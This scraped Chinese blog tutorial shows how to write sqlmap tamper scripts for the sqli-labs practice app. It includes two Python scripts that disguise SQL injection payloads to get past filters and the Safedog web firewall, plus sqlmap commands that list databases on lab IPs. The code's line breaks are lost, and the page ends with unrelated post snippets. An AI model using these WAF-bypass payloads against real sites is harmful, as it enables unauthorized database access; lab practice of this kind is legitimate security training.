当前位置：首页 > news >正文

sqlmap tamper脚本编写

news 2025/7/5 7:57:52

文章目录

tamper脚本是什么？
指定tamper脚本运行sqlmap
安全狗绕过tamper脚本

tamper脚本是什么？

SQLMap 是一款SQL注入神器，可以通过tamper 对注入payload 进行编码和变形，以达到绕过某些限制的目的。但是有些时候，SQLMap 自带的Tamper 脚本并不是特别好用，需要根据实际情况定制Tamper 脚本。

sqlmap的编写语言也是python，tamper脚本能增强sqlmap的功能，达到绕过检测的目的。

指定tamper脚本运行sqlmap

在kali中用下面命令查找sqlmap所在的目录：

find / -name sqlmap

如图，查找成功：

在这里插入图片描述

下面是一个简单的tamper脚本，它将关键字#、and、or和空格都做了替换（and、or双写大小写绕过），加上(?i)忽略大小写（以sqli-labs第26关为例，经过测试这关会过滤空格and、or和空格，需要做双写和大小写绕过）：

import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):"""<space>             %a0and                 anANDd--+                  and '1or                  oORr"""payload = re.sub(r"(?i)#"," and '1",payload)payload = re.sub(r"(?i)and","anANDd",payload)payload = re.sub(r"(?i)or","oORr",payload)payload = re.sub(r"(?i)\ ","%a0",payload)return payload

将这段代码放入一个sqli-labs_26.py中，并将文件放到sqlmap所在的目录：
在这里插入图片描述

运行xampp，打开sqli-labs_26复制路径：

在这里插入图片描述

然后在kali中输入下面命令，运行sqlmap：

-tamper指定运行的tamper脚本

–current-db列出当前数据库

-u指定url

-v 指定sqlmap的回显等级

–dbs 列出所有的数据库

python3 sqlmap -u http://10.9.75.164/sqli-labs/Less-26/?id=2 -v3 -tamper sqli-labs_26.py --current-db

如下图，获取到数据库的名称为security，类型为联合查询：

在这里插入图片描述

安全狗绕过tamper脚本

绕过安全狗

1.脏数据

2.大小写转换

3.双写

4.内联注释

安装安全狗，以sqli-labs第1关为例，绕过安全狗应该从上面4个方面考虑，经过测试，只有第四个方法可行，下面是一个内联注释的脚本：

import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies(): passdef tamper(payload, **kwargs): payload = re.sub(r"(?i)and", "/*!14400and*/", payload)payload = re.sub(r"(?i)order by", "/**/order/*/%0a*a*/by/**/", payload)payload = re.sub(r"(?i)union select", "union/*!88888cas*//*/%0a*a*/select/**/", payload) payload = re.sub(r"(?i)union all select", "union/*!88888cas*//*/%0a*a*/select/**/", payload)payload = re.sub(r"(?i)from information_schema.schemata", "/*!from--%0f/*%0ainformation_schema.schemata*/", payload)payload = re.sub(r"(?i)from information_schema.tables", "/*!from--%0f/*%0ainformation_schema.tables*/", payload)payload = re.sub(r"(?i)from information_schema.columns", "/*!from--%0f/*%0ainformation_schema.columns*/", payload)payload = re.sub(r"(?i)database\(\)", "database(/*!/*/**%0fAJEST*/*/)", payload)#payload = re.sub(r"(?i)count\(*\)","count(1)",payload)payload = re.sub(r"(?i) as","/*!14400as*/",payload)payload = re.sub(r"(?i)char","/*!14400char*/",payload)return payload

和之前获取数据库名称一样，将该脚本文件放到sqlmap所在目录下:

在这里插入图片描述

然后用下面命令运行sqlmap，获取数据库名称：

python3 sqlmap -u http://10.9.75.116/sqli-labs/Less-1/?id=1 -v3 --tamper safedog.py --random-agent --dbs

如图，用该脚本文件做tamper绕过安全狗（绕waf）成功，获得数据库名称：

在这里插入图片描述

sqlmap tamper脚本编写

文章目录 tamper脚本是什么？指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么？ SQLMap 是一款SQL注入神器，可以通过tamper 对注入payload 进行编码和变形，以达到绕过某些限制的目的。但是有些时候，SQLM…...

编程日记 2023/9/23 0:22:00

5.5V-65V Vin同步降压控制器，具有线路前馈SCT82630DHKR

描述： SCT82630是一款65V电压模式控制同步降压控制器，具有线路前馈。40ns受控高压侧MOSFET的最小导通时间支持高转换比，实现从48V输入到低压轨的直接降压转换，降低了系统复杂性和解决方案成本。如果需要，在低至6V的输…...

编程日记 2023/9/23 0:19:58

YOLOv5、YOLOv8改进：Decoupled Head解耦头

目录 1.Decoupled Head介绍 2.Yolov5加入Decoupled_Detect 2.1 DecoupledHead加入common.py中： 2.2 Decoupled_Detect加入yolo.py中： 2.3修改yolov5s_decoupled.yaml 1.Decoupled Head介绍 Decoupled Head是一种图像分割任务中常用的网络结构&#…...

编程日记 2023/9/23 0:18:57

Prometheus+Grafana可视化监控【Redis状态】

文章目录一、安装Docker二、安装Redis数据库(Docker容器方式)三、安装Prometheus四、安装Grafana五、Pronetheus和Grafana相关联六、安装redis_exporter七、Grafana添加Redis监控模板一、安装Docker 注意：我这里使用之前写好脚本进行安装Docker，如果已…...

编程日记 2023/9/23 0:17:56

怒刷LeetCode的第6天（Java版）

目录第一题题目来源题目内容解决方法方法一：哈希表方法二：逐个判断字符方法三：模拟减法第二题题目来源题目内容解决方法方法一：水平扫描法方法二：垂直扫描法方法三：分治法方…...

编程日记 2023/9/23 0:16:55

SSL双向认证-Nginx配置

SSL双向认证需要CA证书，开发过程可以利用自签CA证书进行调试验证。自签CA证书生成过程：SSL双向认证-自签CA证书生成 Nginx配置适用于前端项目或前后端都通过Nginx转发的时候（此时可不配置后端启用双向认证） 1.Nginx配置&#…...

编程日记 2023/9/23 0:14:54

GO学习之远程过程调用(RPC)

GO系列 1、GO学习之Hello World 2、GO学习之入门语法 3、GO学习之切片操作 4、GO学习之 Map 操作 5、GO学习之结构体操作 6、GO学习之通道(Channel) 7、GO学习之多线程(goroutine) 8、GO学习之函数(Function) 9、GO学习之接口(Interface) 10、GO学习之网络通信(Net/Htt…...

编程日记 2023/9/23 0:12:52

八大排序（四）--------直接插入排序

本专栏内容为：八大排序汇总通过本专栏的深入学习，你可以了解并掌握八大排序以及相关的排序算法。 💓博主csdn个人主页：小小unicorn ⏩专栏分类：八大排序汇总 🚚代码仓库：小小unicorn的代码仓库…...

编程日记 2023/9/23 0:11:51

MYSQL--存储引擎和日志管理

存储引擎： 一、存储引擎概念： MySQL中的数据用各种不同的技术存储在文件中，每一种技术都使用不同的存储机制、索引技巧、锁定水平并最终提供不同的功能和能力，这些不同的技术以及配套的功能在MySQL中称为存储引擎。存储引擎是My…...

编程日记 2023/9/23 0:10:50

VUE之更换背景颜色

1. 确定需求在实现之前，首先需要明确需求，即用户可以通过某种方式更改页面背景颜色，所以我们需要提供一个可操作的控件来实现此功能。 2. 创建Vue组件为了实现页面背景颜色更换功能，我们可以创建一个Vue组件。下面是一个简单…...

编程日记 2023/9/23 0:09:50

大型集团借力泛微搭建语言汇率时区统一、业务协同的国际化OA系统

国际化、全球化集团，业务遍布全世界，下属公司众多，集团对管理方式和企业文化塑造有着很高的要求。不少大型集团以数字化方式助力全球统一办公，深化企业统一管理。面对大型集团全球化的管理诉求，数字化办公系统作为集…...

编程日记 2023/9/23 0:08:48

SQL文件在jar里面，github下载 https://github.com/quartz-scheduler/quartz/releases/tag/v2.3.2 解压，sql文件路径：quartz-core\src\main\resources\org\quartz\impl\jdbcjobstore tables_mysql_innodb.sql # # In your Quartz propertie…...

编程日记 2023/9/23 0:07:48

nginx SseEmitter 长连接

1、问题还原： 在做openai机器人时，后台使用 SseEmitterEventSource 实现流式获取数据，前端通过 EventSourcePolyfill 函数接收后端的数据，在页面流式输出到页面，做成逐字打稿的效果。本地测试后，可以正常获…...

编程日记 2023/9/23 0:06:47

若依cloud -【 100 ~ 】

100 分布式日志介绍 | RuoYi 分布式日志就相当于把日志存储在不同的设备上面。比如若依项目中有ruoyi-modules-file、ruoyi-modules-gen、ruoyi-modules-job、ruoyi-modules-system四个应用，每个应用都部署在单独的一台机器里边，应用对应的日志的也单独存…...

编程日记 2023/9/23 0:05:46

VPN协议是如何工作的

VPN，全名 Virtual Private Network，虚拟专用网，就是利用开放的公众网络，建立专用数据传输通道，将远程的分支机构、移动办公人员等连接起来。 VPN 通过隧道技术在公众网络上仿真一条点到点的专线，是通过利用…...

编程日记 2023/9/23 0:03:45

c++：：作用域符解析

1）当存在具有相同名称的局部变量时，要访问全局变量 2）在类之外定义函数。 class A { } void A::func(){ }A a;a.func();3）访问一个类的静态变量 class A { static int b; } A::b; 4) 如果两个命名空间中都存在一个具有相同名称的类…...

编程日记 2023/9/23 0:02:44